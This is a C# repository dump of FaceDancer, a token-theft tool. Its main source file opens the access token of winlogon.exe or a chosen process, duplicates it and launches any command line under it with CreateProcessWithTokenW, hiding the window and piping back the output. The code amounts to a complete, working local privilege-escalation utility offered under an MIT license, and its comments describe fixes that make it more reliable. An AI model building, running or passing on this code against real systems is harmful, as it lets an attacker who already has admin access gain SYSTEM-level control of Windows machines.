├── .gitignore ├── FaceDancer.sln ├── FaceDancer ├── FaceDancer.cs ├── FaceDancer.csproj └── Properties │ └── AssemblyInfo.cs ├── LICENSE └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.suo 8 | *.user 9 | *.userosscache 10 | *.sln.docstates 11 | 12 | # User-specific files (MonoDevelop/Xamarin Studio) 13 | *.userprefs 14 | 15 | # Build results 16 | [Dd]ebug/ 17 | [Dd]ebugPublic/ 18 | [Rr]elease/ 19 | [Rr]eleases/ 20 | x64/ 21 | x86/ 22 | bld/ 23 | [Bb]in/ 24 | [Oo]bj/ 25 | [Ll]og/ 26 | 27 | # Visual Studio 2015/2017 cache/options directory 28 | .vs/ 29 | # Uncomment if you have tasks that create the project's static files in wwwroot 30 | #wwwroot/ 31 | 32 | # Visual Studio 2017 auto generated files 33 | Generated\ Files/ 34 | 35 | # MSTest test Results 36 | [Tt]est[Rr]esult*/ 37 | [Bb]uild[Ll]og.* 38 | 39 | # NUNIT 40 | *.VisualState.xml 41 | TestResult.xml 42 | 43 | # Build Results of an ATL Project 44 | [Dd]ebugPS/ 45 | [Rr]eleasePS/ 46 | dlldata.c 47 | 48 | # Benchmark Results 49 | BenchmarkDotNet.Artifacts/ 50 | 51 | # .NET Core 52 | project.lock.json 53 | project.fragment.lock.json 54 | artifacts/ 55 | **/Properties/launchSettings.json 56 | 57 | # StyleCop 58 | StyleCopReport.xml 59 | 60 | # Files built by Visual Studio 61 | *_i.c 62 | *_p.c 63 | *_i.h 64 | *.ilk 65 | *.meta 66 | *.obj 67 | *.iobj 68 | *.pch 69 | *.pdb 70 | *.ipdb 71 | *.pgc 72 | *.pgd 73 | *.rsp 74 | *.sbr 75 | *.tlb 76 | *.tli 77 | *.tlh 78 | *.tmp 79 | *.tmp_proj 80 | *.log 81 | *.vspscc 82 | *.vssscc 83 | .builds 84 | *.pidb 85 | *.svclog 86 | *.scc 87 | 88 | # Chutzpah Test files 89 | _Chutzpah* 90 | 91 | # Visual C++ cache files 92 | ipch/ 93 | *.aps 94 | *.ncb 95 | *.opendb 
96 | *.opensdf 97 | *.sdf 98 | *.cachefile 99 | *.VC.db 100 | *.VC.VC.opendb 101 | 102 | # Visual Studio profiler 103 | *.psess 104 | *.vsp 105 | *.vspx 106 | *.sap 107 | 108 | # Visual Studio Trace Files 109 | *.e2e 110 | 111 | # TFS 2012 Local Workspace 112 | $tf/ 113 | 114 | # Guidance Automation Toolkit 115 | *.gpState 116 | 117 | # ReSharper is a .NET coding add-in 118 | _ReSharper*/ 119 | *.[Rr]e[Ss]harper 120 | *.DotSettings.user 121 | 122 | # JustCode is a .NET coding add-in 123 | .JustCode 124 | 125 | # TeamCity is a build add-in 126 | _TeamCity* 127 | 128 | # DotCover is a Code Coverage Tool 129 | *.dotCover 130 | 131 | # AxoCover is a Code Coverage Tool 132 | .axoCover/* 133 | !.axoCover/settings.json 134 | 135 | # Visual Studio code coverage results 136 | *.coverage 137 | *.coveragexml 138 | 139 | # NCrunch 140 | _NCrunch_* 141 | .*crunch*.local.xml 142 | nCrunchTemp_* 143 | 144 | # MightyMoose 145 | *.mm.* 146 | AutoTest.Net/ 147 | 148 | # Web workbench (sass) 149 | .sass-cache/ 150 | 151 | # Installshield output folder 152 | [Ee]xpress/ 153 | 154 | # DocProject is a documentation generator add-in 155 | DocProject/buildhelp/ 156 | DocProject/Help/*.HxT 157 | DocProject/Help/*.HxC 158 | DocProject/Help/*.hhc 159 | DocProject/Help/*.hhk 160 | DocProject/Help/*.hhp 161 | DocProject/Help/Html2 162 | DocProject/Help/html 163 | 164 | # Click-Once directory 165 | publish/ 166 | 167 | # Publish Web Output 168 | *.[Pp]ublish.xml 169 | *.azurePubxml 170 | # Note: Comment the next line if you want to checkin your web deploy settings, 171 | # but database connection strings (with potential passwords) will be unencrypted 172 | *.pubxml 173 | *.publishproj 174 | 175 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 176 | # checkin your Azure Web App publish settings, but sensitive information contained 177 | # in these scripts will be unencrypted 178 | PublishScripts/ 179 | 180 | # NuGet Packages 181 | *.nupkg 182 | # The packages folder can be ignored because of Package Restore 183 | **/[Pp]ackages/* 184 | # except build/, which is used as an MSBuild target. 185 | !**/[Pp]ackages/build/ 186 | # Uncomment if necessary however generally it will be regenerated when needed 187 | #!**/[Pp]ackages/repositories.config 188 | # NuGet v3's project.json files produces more ignorable files 189 | *.nuget.props 190 | *.nuget.targets 191 | 192 | # Microsoft Azure Build Output 193 | csx/ 194 | *.build.csdef 195 | 196 | # Microsoft Azure Emulator 197 | ecf/ 198 | rcf/ 199 | 200 | # Windows Store app package directories and files 201 | AppPackages/ 202 | BundleArtifacts/ 203 | Package.StoreAssociation.xml 204 | _pkginfo.txt 205 | *.appx 206 | 207 | # Visual Studio cache files 208 | # files ending in .cache can be ignored 209 | *.[Cc]ache 210 | # but keep track of directories ending in .cache 211 | !*.[Cc]ache/ 212 | 213 | # Others 214 | ClientBin/ 215 | ~$* 216 | *~ 217 | *.dbmdl 218 | *.dbproj.schemaview 219 | *.jfm 220 | *.pfx 221 | *.publishsettings 222 | orleans.codegen.cs 223 | 224 | # Including strong name files can present a security risk 225 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 226 | #*.snk 227 | 228 | # Since there are multiple workflows, uncomment next line to ignore bower_components 229 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 230 | #bower_components/ 231 | 232 | # RIA/Silverlight projects 233 | Generated_Code/ 234 | 235 | # Backup & report files from converting an old project file 236 | # to a newer Visual Studio version. 
Backup files are not needed, 237 | # because we have git ;-) 238 | _UpgradeReport_Files/ 239 | Backup*/ 240 | UpgradeLog*.XML 241 | UpgradeLog*.htm 242 | ServiceFabricBackup/ 243 | *.rptproj.bak 244 | 245 | # SQL Server files 246 | *.mdf 247 | *.ldf 248 | *.ndf 249 | 250 | # Business Intelligence projects 251 | *.rdl.data 252 | *.bim.layout 253 | *.bim_*.settings 254 | *.rptproj.rsuser 255 | 256 | # Microsoft Fakes 257 | FakesAssemblies/ 258 | 259 | # GhostDoc plugin setting file 260 | *.GhostDoc.xml 261 | 262 | # Node.js Tools for Visual Studio 263 | .ntvs_analysis.dat 264 | node_modules/ 265 | 266 | # Visual Studio 6 build log 267 | *.plg 268 | 269 | # Visual Studio 6 workspace options file 270 | *.opt 271 | 272 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 273 | *.vbw 274 | 275 | # Visual Studio LightSwitch build output 276 | **/*.HTMLClient/GeneratedArtifacts 277 | **/*.DesktopClient/GeneratedArtifacts 278 | **/*.DesktopClient/ModelManifest.xml 279 | **/*.Server/GeneratedArtifacts 280 | **/*.Server/ModelManifest.xml 281 | _Pvt_Extensions 282 | 283 | # Paket dependency manager 284 | .paket/paket.exe 285 | paket-files/ 286 | 287 | # FAKE - F# Make 288 | .fake/ 289 | 290 | # JetBrains Rider 291 | .idea/ 292 | *.sln.iml 293 | 294 | # CodeRush 295 | .cr/ 296 | 297 | # Python Tools for Visual Studio (PTVS) 298 | __pycache__/ 299 | *.pyc 300 | 301 | # Cake - Uncomment if you are using it 302 | # tools/** 303 | # !tools/packages.config 304 | 305 | # Tabs Studio 306 | *.tss 307 | 308 | # Telerik's JustMock configuration file 309 | *.jmconfig 310 | 311 | # BizTalk build output 312 | *.btp.cs 313 | *.btm.cs 314 | *.odx.cs 315 | *.xsd.cs 316 | 317 | # OpenCover UI analysis results 318 | OpenCover/ 319 | 320 | # Azure Stream Analytics local run output 321 | ASALocalRun/ 322 | 323 | # MSBuild Binary and Structured Log 324 | *.binlog 325 | 326 | # NVidia Nsight GPU debugger configuration file 327 | *.nvuser 328 | 329 | # MFractors 
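using Microsoft.Win32.SafeHandles;
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Linq;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Threading;

namespace FaceDancer
{
    /// <summary>
    /// Token-theft demo. Opens the access token of a target process (winlogon.exe when no
    /// PID is given), duplicates it as a primary token and launches a command line under it
    /// with CreateProcessWithTokenW, relaying the child's stdout/stderr back through an
    /// anonymous pipe.
    ///
    /// Privileges are NOT adjusted here: CreateProcessWithTokenW requires SeImpersonatePrivilege
    /// in the caller, and opening the token of a SYSTEM process such as winlogon normally needs
    /// an elevated caller (SeDebugPrivilege). Without them the Win32 calls fail and the failure
    /// is reported with its last-error code.
    /// </summary>
    class FaceDancer
    {
        // ----- advapi32 / kernel32 interop ------------------------------------------------

        [DllImport("advapi32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        internal static extern bool OpenProcessToken(IntPtr ProcessHandle,
            uint desiredAccess, out IntPtr TokenHandle);

        [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        internal extern static bool DuplicateTokenEx(
            IntPtr hExistingToken,
            uint dwDesiredAccess,
            IntPtr lpTokenAttributes,
            uint ImpersonationLevel,
            TOKEN_TYPE TokenType,
            out IntPtr phNewToken);

        internal enum TOKEN_TYPE
        {
            TokenPrimary = 1,
            TokenImpersonation
        }

        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
        internal static extern bool CreateProcessWithTokenW(IntPtr hToken, IntPtr dwLogonFlags,
            string lpApplicationName, string lpCommandLine, IntPtr dwCreationFlags,
            IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo,
            out PROCESS_INFORMATION lpProcessInformation);

        // Kept for callers; Main passes dwCreationFlags == 0 and does not use these.
        internal enum CreationFlags
        {
            DefaultErrorMode = 0x04000000,
            NewConsole = 0x00000010,
            NewProcessGroup = 0x00000200,
            SeparateWOWVDM = 0x00000800,
            Suspended = 0x00000004,
            UnicodeEnvironment = 0x00000400,
            ExtendedStartupInfoPresent = 0x00080000
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public int dwProcessId;
            public int dwThreadId;
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
        internal struct STARTUPINFO
        {
            public Int32 cb;
            public IntPtr lpReserved;
            public IntPtr lpDesktop;
            public IntPtr lpTitle;
            public Int32 dwX;
            public Int32 dwY;
            public Int32 dwXSize;
            public Int32 dwYSize;
            public Int32 dwXCountChars;
            public Int32 dwYCountChars;
            public Int32 dwFillAttribute;
            public STARTF dwFlags;
            public Int16 wShowWindow;
            public Int16 cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        [Flags]
        internal enum STARTF : uint
        {
            STARTF_USESHOWWINDOW = 0x00000001,
            STARTF_USESIZE = 0x00000002,
            STARTF_USEPOSITION = 0x00000004,
            STARTF_USECOUNTCHARS = 0x00000008,
            STARTF_USEFILLATTRIBUTE = 0x00000010,
            STARTF_RUNFULLSCREEN = 0x00000020, // ignored for non-x86 platforms
            STARTF_FORCEONFEEDBACK = 0x00000040,
            STARTF_FORCEOFFFEEDBACK = 0x00000080,
            STARTF_USESTDHANDLES = 0x00000100,
        }

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CloseHandle(IntPtr hObject);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

        private const uint INFINITE = 0xFFFFFFFF;

        // Command line run when none is supplied on the command line.
        internal const string DefaultCommandLine = "whoami /priv";
        // Process whose token is taken when no PID is supplied.
        internal const string DefaultTargetProcess = "winlogon";
        // Working directory the tool prefers for the child; only used when it exists, because
        // CreateProcessWithTokenW fails outright on a non-existent lpCurrentDirectory.
        private const string PreferredWorkingDirectory = "C:\\Temp";

        /// <summary>
        /// Entry point: <c>FaceDancer.exe [PID] [command line]</c>.
        /// Sets a non-zero exit code on any failure instead of throwing.
        /// </summary>
        static void Main(string[] args)
        {
            int procId;
            string commandLine;
            if (!ParseArguments(args, out procId, out commandLine))
            {
                Console.WriteLine("Usage: FaceDancer.exe [PID] [command line]");
                Environment.ExitCode = 1;
                return;
            }
            Console.WriteLine("Stealing token from PID " + procId);

            IntPtr tokenHandle = IntPtr.Zero;
            IntPtr dupHandle = IntPtr.Zero;
            PROCESS_INFORMATION newProc = new PROCESS_INFORMATION();
            try
            {
                if (!OpenTargetToken(procId, out tokenHandle))
                {
                    return;
                }

                // CreateProcessWithTokenW is documented to take a *primary* token, so the
                // duplicate is made as TokenPrimary (the original asked for an impersonation
                // token). SecurityImpersonation remains the level to request.
                bool duplicated = DuplicateTokenEx(tokenHandle, (uint)TokenAccessLevels.MaximumAllowed, IntPtr.Zero,
                    (uint)TokenImpersonationLevel.Impersonation, TOKEN_TYPE.TokenPrimary, out dupHandle);
                int dupError = Marshal.GetLastWin32Error(); // capture before anything else can clobber it
                Console.WriteLine("DuplicateTokenEx: " + duplicated);
                if (!duplicated)
                {
                    ReportFailure("DuplicateTokenEx", dupError);
                    return;
                }
                Console.WriteLine("Impersonated user: " + new WindowsIdentity(dupHandle).Name);

                string output;
                if (!LaunchWithToken(dupHandle, commandLine, out newProc, out output))
                {
                    return;
                }
                Console.WriteLine("Process output: " + output);
            }
            finally
            {
                // The original leaked hProcess/hThread and skipped the token handles on any
                // early failure; release everything on every path.
                CloseIfValid(newProc.hThread);
                CloseIfValid(newProc.hProcess);
                CloseIfValid(dupHandle);
                CloseIfValid(tokenHandle);
            }
        }

        /// <summary>
        /// Interprets the command line. Zero arguments: default target and default command.
        /// One argument: a PID if it parses as an integer, otherwise a command line to run under
        /// the default target (the original used "contains a dot" as that test; an integer never
        /// contains a dot, so this is a superset). Two or more: PID then command line.
        /// Returns false, after printing a reason where it can, when the input is unusable.
        /// </summary>
        internal static bool ParseArguments(string[] args, out int procId, out string commandLine)
        {
            procId = -1;
            commandLine = DefaultCommandLine;
            bool needDefaultTarget = false;

            if (args == null || args.Length == 0)
            {
                needDefaultTarget = true;
            }
            else if (args.Length == 1)
            {
                if (!int.TryParse(args[0], out procId))
                {
                    needDefaultTarget = true;
                    commandLine = args[0];
                }
            }
            else
            {
                if (!int.TryParse(args[0], out procId))
                {
                    Console.WriteLine("'" + args[0] + "' is not a valid PID");
                    return false;
                }
                commandLine = args[1];
            }

            if (needDefaultTarget)
            {
                procId = FindProcessIdByName(DefaultTargetProcess);
                if (procId < 0)
                {
                    Console.WriteLine("No running process named " + DefaultTargetProcess);
                    return false;
                }
            }
            return true;
        }

        /// <summary>
        /// Returns the PID of the first process with the given image name, or -1 if none.
        /// Disposes the Process objects the lookup allocates.
        /// </summary>
        private static int FindProcessIdByName(string name)
        {
            Process[] matches = Process.GetProcessesByName(name);
            try
            {
                return matches.Length > 0 ? matches[0].Id : -1;
            }
            finally
            {
                foreach (Process p in matches)
                {
                    p.Dispose();
                }
            }
        }

        /// <summary>
        /// Opens the target process and its token with MAXIMUM_ALLOWED access.
        /// On failure prints the reason, sets the exit code and returns false.
        /// </summary>
        private static bool OpenTargetToken(int procId, out IntPtr tokenHandle)
        {
            tokenHandle = IntPtr.Zero;
            try
            {
                // Process.Handle is owned by the Process object. The original wrapped it in a
                // second owning SafeWaitHandle, so the same handle was closed twice.
                using (Process target = Process.GetProcessById(procId))
                {
                    bool opened = OpenProcessToken(target.Handle, (uint)TokenAccessLevels.MaximumAllowed, out tokenHandle);
                    int error = Marshal.GetLastWin32Error();
                    Console.WriteLine("OpenProcessToken: " + opened);
                    if (!opened)
                    {
                        ReportFailure("OpenProcessToken", error);
                    }
                    return opened;
                }
            }
            catch (ArgumentException)
            {
                // GetProcessById: no process with that ID.
                Console.WriteLine("No running process with PID " + procId);
                Environment.ExitCode = 1;
                return false;
            }
            catch (System.ComponentModel.Win32Exception ex)
            {
                // Process.Handle: access denied (e.g. not elevated / no SeDebugPrivilege).
                Console.WriteLine("Cannot open PID " + procId + ": " + ex.Message);
                Environment.ExitCode = 1;
                return false;
            }
        }

        /// <summary>
        /// Starts <paramref name="commandLine"/> under <paramref name="token"/> with stdout and
        /// stderr redirected into an anonymous pipe, waits for it to exit and returns its output.
        /// The caller owns and must close the handles in <paramref name="procInfo"/>.
        /// </summary>
        private static bool LaunchWithToken(IntPtr token, string commandLine,
            out PROCESS_INFORMATION procInfo, out string output)
        {
            output = null;
            // We keep the read end; the inheritable write end is handed to the child as its
            // stdout/stderr (seclogon duplicates the STARTUPINFO std handles into the new
            // process — TODO confirm against the CreateProcessWithTokenW docs for your OS).
            // No custom DACL: the original granted "NT AUTHORITY\Everyone" FullControl on the
            // pipe, which is not needed for the hand-off and only widened access to it.
            using (AnonymousPipeServerStream pipeServer =
                new AnonymousPipeServerStream(PipeDirection.In, HandleInheritability.Inheritable, 4096))
            {
                STARTUPINFO startInfo = new STARTUPINFO();
                startInfo.cb = Marshal.SizeOf(typeof(STARTUPINFO)); // required by the API; was left at 0
                startInfo.hStdOutput = pipeServer.ClientSafePipeHandle.DangerousGetHandle();
                startInfo.hStdError = startInfo.hStdOutput;
                // hStdInput is deliberately left null: nothing is fed to the child.
                // wShowWindow stays 0 (SW_HIDE); output comes back through the pipe, not a window.
                startInfo.dwFlags = STARTF.STARTF_USESTDHANDLES | STARTF.STARTF_USESHOWWINDOW;

                string workDir = Directory.Exists(PreferredWorkingDirectory) ? PreferredWorkingDirectory : null;
                bool created = CreateProcessWithTokenW(token, IntPtr.Zero, null, commandLine, IntPtr.Zero,
                    IntPtr.Zero, workDir, ref startInfo, out procInfo);
                int error = Marshal.GetLastWin32Error();

                // Drop our copy of the write end right away: while this process still holds a
                // writer, ReadToEnd() below can never see EOF.
                pipeServer.DisposeLocalCopyOfClientHandle();

                Console.WriteLine("CreateProcess return code: " + created);
                if (!created)
                {
                    ReportFailure("CreateProcessWithTokenW", error);
                    return false;
                }
                Console.WriteLine("Started process with ID " + procInfo.dwProcessId);

                // Drain the pipe *before* waiting for exit. A child that writes more than the
                // 4 KiB buffer blocks until someone reads, so the original wait-then-read order
                // deadlocked on chatty commands.
                using (StreamReader reader = new StreamReader(pipeServer))
                {
                    output = reader.ReadToEnd();
                }

                // Wait on the process handle we were given rather than re-resolving the PID
                // (the original's GetProcessById(pid) throws if the child already exited and is
                // exposed to PID reuse).
                WaitForSingleObject(procInfo.hProcess, INFINITE);
                return true;
            }
        }

        /// <summary>Prints a failed Win32 call with its last-error code and marks the run failed.</summary>
        private static void ReportFailure(string api, int lastError)
        {
            Console.WriteLine(api + " failed, Win32 error " + lastError);
            Environment.ExitCode = 1;
        }

        /// <summary>CloseHandle that tolerates a handle that was never assigned.</summary>
        private static void CloseIfValid(IntPtr handle)
        {
            if (handle != IntPtr.Zero)
            {
                CloseHandle(handle);
            }
        }
    }
}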
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("dacc9d42-d51b-4594-8dbc-eb9dedc1ccd1")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 001SPARTaN 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FaceDancer 2 | Playing around with token manipulation in C#. This will try to steal a token from the target PID (defaults to winlogon.exe), duplicate it and run the specified command line under that token via CreateProcessWithTokenW (defaults to `whoami /priv`), printing the child's output. The caller must be able to open the target process's token, which for winlogon.exe normally means an elevated context, and CreateProcessWithTokenW requires SeImpersonatePrivilege; no privileges are adjusted by the tool. 3 | 4 | ## Usage 5 | FaceDancer.exe [PID] [command line] 6 | --------------------------------------------------------------------------------